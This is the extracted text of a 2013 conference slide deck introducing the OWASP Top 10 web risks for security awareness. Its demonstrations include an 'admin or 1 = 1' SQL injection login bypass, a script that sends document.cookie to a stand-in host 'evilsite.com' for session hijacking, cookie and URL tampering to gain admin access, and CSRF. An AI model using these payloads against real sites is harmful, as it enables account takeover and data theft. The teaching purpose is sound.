16th Annual Karnataka Conference GRC Compliance to Culture JULY 19 & 20, 2013 Topic OWASP Top 10 An Overview Speakers Akash Mahajan & Tamaghna Basu
OWASP Top 10 An Overview The Open Web Application Security Project brings out web security guidance in various forms for different stakeholders for Application Security. Whilst the Top 10 Web Risks and Vulnerabilities is their most followed and used document, the awareness level about it is still pretty low. We will cover an overview of OWASP Top 10 from a security practitioners points of view and using a few demonstrations explain why you and your organization should actively follow and start utilizing this completely free and open resource. Whether you are contemplating starting an Application Security Program or would like to validate what you are already doing, this talk and demonstration will definitely give you something to think about.
OWASP Top 10 An Overview Akash Mahajan and Tamaghna Basu
OWASP Top 10 will enable you to separate signal from the noise
Na1onal Ins1tute of Standards and Technology (NIST) - USA Na1onal Security Agency (NSA) USA Payment Card Industry Security Standards Council - Worldwide Defence Informa1on Systems Agency (DISA) USA Europe Network and Informa1on Security Agency (ENISA) USA Other agencies like IEEE, ANSSI France, BSI Germany, Center for Internet Security USA, CPNI UK Who follows OWASP Top 10?
All the juicy data is in the app layer now
Vulnerability + Threat = Risk
Untrusted Input ANack In & Data Out
Untrusted Input
A1 - Injection OWASP Top 10 An Overview
A1 - SQL Injection Normal Login
A1 - SQL Injection Login Successful
A1 - SQL Injection Invalid Username/password
A1 - SQL Injection Type admin
A1 - SQL Injection DB error: You have an error in SQL syntax
A1 - SQL statement in error details: SELECT * FROM accounts WHERE username = admin AND password= admin
What we got: SELECT * FROM accounts WHERE username = admin AND password= admin SQL statement to bypass validation: SELECT * FROM accounts WHERE username = admin or 1 = 1 AND password= admin or 1 = 1 Attack vector: admin or 1 = 1 A1 - SQL Injection
A1 - SQL Injection admin or 1 = 1
A1 - SQL Injection Login bypass
A1 - SQL Injection Data extraction
A1 - SQL Injection
A3 Cross Site Scripting / XSS OWASP Top 10 An Overview
A3 - XSS
A3 - XSS User input is rexlected back to the page
A3 - XSS - <script>alert(1)</script>
A3 XSS Script got executed
A3 - XSS - <script>alert(document.cookie)</script>
A3 - XSS Got the cookie
<script>window.loca1on="hnp://www.evilsite.com? cookie="+document.cookie;</script> hnp://www.evilsite.com/?cookie=showhints=0;%20username=ed; %20uid=1;%20PHPSESSID=fggru3irrkl@ff6js91uida24 Session Hijacking A3 - XSS - What is next?
Authentication Do I really know you?
On the internet nobody knows you are a dog
A2 - Broken Authentication & Session Management OWASP Top 10 An Overview
A2 Login with username ed
A2 Logged in as ed
A2 View Cookie name: uid, value: 16
A2 Change the value: 1
A2 Reload the page, user changed to admin
I am not sure if you are allowed to do that.
A4 Insecure Direct Object Reference OWASP Top 10 An Overview
hgps://www.onlinebank.com/user?acct=6065 ANacker no1ces his acct parameter is 6065?acct=6065 He modifies it to a nearby number?acct=6066 ANacker views the vic1m s account informa1on A4 Accessing another person s account
A7 Missing function level access control OWASP Top 10 An Overview
ANacker no1ces the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts Failure to Restrict URL Access Illustrated ANacker views more accounts than just their own
A8 Cross Site Request Forgery OWASP Top 10 An Overview
CSRF? Active Connection Vic1m Sends request with cookie without his knowledge Web Applica1on Fake Link with some fancy offer ANacker
Security Mistakes Its funny when it happens to others
You ran the web server as root with 777 for uploads!
Network Solu1ons s shared Wordpress hos1ng rwxrwxrwx 1 root root 0 2010-11- 23 08:21 wp- config.php A5 Security MisconXigurations
A6 Sensitive Data Exposure
A9 Using components with known vulnerabilities
A1 - Injec1on A3 Cross Site Scrip1ng Untrusted Inputs A2 - Broken Authen1ca1on & Session Management A4 - Insecure Direct Object Reference A7 - Missing func1on level access control A8 - Cross Site Request Forgery Authen1ca1on /Authoriza1on A5 - Security Misconfigura1on A6 - Sensi1ve Data Exposure A9 - Using vulnerable components Security Mistakes Recap
Use OWASP and write secure apps Conclusions
akashmahajan@gmail.com tamaghna.basu@gmail.com Do you have any questions?